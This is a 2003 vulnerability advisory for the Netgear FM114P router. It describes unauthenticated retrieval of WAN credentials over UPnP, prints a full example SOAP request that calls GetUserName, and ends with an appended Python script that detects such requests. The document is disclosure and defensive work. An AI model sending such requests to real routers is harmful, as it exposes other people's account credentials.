Netgear FM114P ProSafe Wireless Router WAN Username and Password Retrieval Vulnerability
Date: 2003-04-05

Author : Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de>

Hi, I found another security problem in the Netgear ProSafe wireless router model FM114P:
When the remote-access and UPnP features are enabled, the WAN connection username and password can be retrieved without any authentication using UPnP. If remote management is enabled, anyone can do this from the web. This is done by sending UPnP SOAP requests to the router with the functions GetUserName and GetPassword. I don't know why such functions exist, because router configuration is normally done via the web interface.

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>

---- end of example request to get username --------------

Affected firmware versions:
--> v1.4 Beta Release 21 has been tested
--> all previous versions with UPnP may be affected

Solution: disable remote management and/or UPnP until the bug is fixed by Netgear.

Regards, b.stickler

http://intex.ath.cx
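A defender-side check for the requests this advisory describes, as an added example that is not part of the original advisory: it parses captured HTTP requests and flags WANPPPConnection SOAP calls to GetUserName or GetPassword, noting whether the source is outside the LAN. The 192.168.0.0/24 LAN range, the function names and the sample requests are assumptions constructed for illustration.

```python
import ipaddress
import re

# Action names and service type come from the advisory's text and example request.
SENSITIVE_ACTIONS = {"GetUserName", "GetPassword"}
SERVICE = "urn:schemas-upnp-org:service:WANPPPConnection:1"
LAN = ipaddress.ip_network("192.168.0.0/24")  # assumption: LAN around 192.168.0.1
BODY_ACTION = re.compile(r'<\w+:(\w+)\s[^>]*xmlns:\w+="' + re.escape(SERVICE) + '"')

def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def credential_action(raw):
    """Return the credential-disclosing action a request invokes, or None."""
    request_line, headers, body = parse_request(raw)
    if not request_line.upper().startswith("POST "):
        return None
    # SOAPACTION has the form "<service type>#<action>", usually quoted.
    service, _, action = headers.get("soapaction", "").strip('"').partition("#")
    if service == SERVICE and action in SENSITIVE_ACTIONS:
        return action
    # Fall back to the body element when the header is missing or malformed.
    m = BODY_ACTION.search(body)
    return m.group(1) if m and m.group(1) in SENSITIVE_ACTIONS else None

def triage(src_ip, raw):
    """Classify one captured request: None, or (origin, action)."""
    action = credential_action(raw)
    if action is None:
        return None
    origin = "lan" if ipaddress.ip_address(src_ip) in LAN else "external"
    return origin, action

def sample(action, with_header=True):
    """Constructed request shaped like the advisory's example (not real traffic)."""
    soap = f'SOAPACTION: "{SERVICE}#{action}"\r\n' if with_header else ""
    return ("POST /upnp/service/WANPPPConnection HTTP/1.1\r\nHOST: 192.168.0.1:80\r\n"
            f"{soap}CONTENT-TYPE: text/xml\r\n\r\n<s:Body>\n<u:{action}\n"
            f'xmlns:u="{SERVICE}" />\n</s:Body>\n')

if __name__ == "__main__":  # 203.0.113.7 is a documentation address
    print(triage("203.0.113.7", sample("GetPassword")))
```

An `external` result means the request arrived from outside the LAN, which matches the remote-management case the advisory warns about.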
